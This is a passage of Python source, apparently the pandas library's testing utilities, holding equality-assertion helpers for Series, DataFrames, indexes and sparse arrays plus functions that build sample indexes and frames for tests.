except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = "{obj} classes are not equivalent".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = "{obj} classes are different".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = 'Attribute "{attr}" are different'.format(attr=attr)
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, type "
"encountered {name!r}"
).format(name=el.__class__.__name__)
assert isinstance(el, (plt.Axes, dict)), msg
else:
assert isinstance(objs, (plt.Artist, tuple, dict)), (
"objs is neither an ndarray of Artist instances nor a "
'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
name=objs.__class__.__name__
)
)
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(
left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
)
assert_numpy_array_equal(
left.codes,
right.codes,
check_dtype=check_dtype,
obj="{obj}.codes".format(obj=obj),
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj="{obj}.categories".format(obj=obj),
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj="{obj}.values".format(obj=obj),
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(
left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_index_equal(
left.right, right.right, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(
left._data, right._data, obj="{obj}.values".format(obj=obj)
)
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
obj=obj, message=message, left=left, right=right
)
if diff is not None:
msg += "\n[diff]: {diff}".format(diff=diff)
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
""" Checks that 'np.ndarray' is equivalent
Parameters
----------
left : np.ndarray or iterable
right : np.ndarray or iterable
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype: bool, default True
check dtype if both a and b are np.ndarray
err_msg : str, default None
If provided, used as assertion message
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
elif check_same == "copy":
if left_base is right_base:
msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shapes are different".format(obj=obj),
left.shape,
right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = "{len}, {left}".format(len=len(left), left=left.index)
msg2 = "{len}, {right}".format(len=len(right), right=right.index)
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right)
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
"[datetimelike_compat=True] {left} is not equal to " "{right}."
).format(left=left.values, right=right.values)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool / string {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical, i.e.
* left.index.names == right.index.names
* left.columns.names == right.columns.names
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas.util.testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
AssertionError: Attributes are different
...
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
# ToDo: There are some tests using rhs is SparseDataFrame
# lhs is DataFrame. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shape mismatch".format(obj=obj),
"{shape!r}".format(shape=left.shape),
"{shape!r}".format(shape=right.shape),
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.columns".format(obj=obj),
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
**kwargs
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
def assert_sp_series_equal(
left,
right,
check_dtype=True,
exact_indices=True,
check_series_type=True,
check_names=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
obj="SparseSeries",
):
"""Check that the left and right SparseSeries are equal.
Parameters
----------
left : SparseSeries
right : SparseSeries
check_dtype : bool, default True
Whether to check the Series dtype is identical.
exact_indices : bool, default True
check_series_type : bool, default True
Whether to check the SparseSeries class is identical.
check_names : bool, default True
Whether to check the SparseSeries name attribute.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
obj : str, default 'SparseSeries'
Specify the object name being compared, internally used to show
the appropriate assertion message.
"""
_check_isinstance(left, right, pd.SparseSeries)
if check_series_type:
assert_class_equal(left, right, obj=obj)
assert_index_equal(left.index, right.index, obj="{obj}.index".format(obj=obj))
assert_sp_array_equal(
left.values,
right.values,
check_kind=check_kind,
check_fill_value=check_fill_value,
consolidate_block_indices=consolidate_block_indices,
)
if check_names:
assert_attr_equal("name", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(np.asarray(left.values), np.asarray(right.values))
def assert_sp_frame_equal(
left,
right,
check_dtype=True,
exact_indices=True,
check_frame_type=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
obj="SparseDataFrame",
):
"""Check that the left and right SparseDataFrame are equal.
Parameters
----------
left : SparseDataFrame
right : SparseDataFrame
check_dtype : bool, default True
Whether to check the Series dtype is identical.
exact_indices : bool, default True
SparseSeries SparseIndex objects must be exactly the same,
otherwise just compare dense representations.
check_frame_type : bool, default True
Whether to check the SparseDataFrame class is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
obj : str, default 'SparseDataFrame'
Specify the object name being compared, internally used to show
the appropriate assertion message.
"""
_check_isinstance(left, right, pd.SparseDataFrame)
if check_frame_type:
assert_class_equal(left, right, obj=obj)
assert_index_equal(left.index, right.index, obj="{obj}.index".format(obj=obj))
assert_index_equal(left.columns, right.columns, obj="{obj}.columns".format(obj=obj))
if check_fill_value:
assert_attr_equal("default_fill_value", left, right, obj=obj)
for col, series in left.items():
assert col in right
# trade-off?
if exact_indices:
assert_sp_series_equal(
series,
right[col],
check_dtype=check_dtype,
check_kind=check_kind,
check_fill_value=check_fill_value,
consolidate_block_indices=consolidate_block_indices,
)
else:
assert_series_equal(
series.to_dense(), right[col].to_dense(), check_dtype=check_dtype
)
# do I care?
# assert(left.default_kind == right.default_kind)
for col in right:
assert col in left
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '{key!r}'".format(key=k)
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
"Expected object {obj1!r} and object {obj2!r} to be "
"different objects, but they were the same object."
).format(obj1=type(elem1), obj2=type(elem2))
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(np.random.choice(x, k), name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
dateIndex = makeDateIndex(N)
dateIndex = Index(dateIndex, dtype=object)
index = makeStringIndex(N)
return Series(dateIndex, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
'"{idx_type}" is not a legal value for `idx_type`, '
'use "i"/"f"/"s"/"u"/"dt/"p"/"td".'.format(idx_type=idx_type)
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
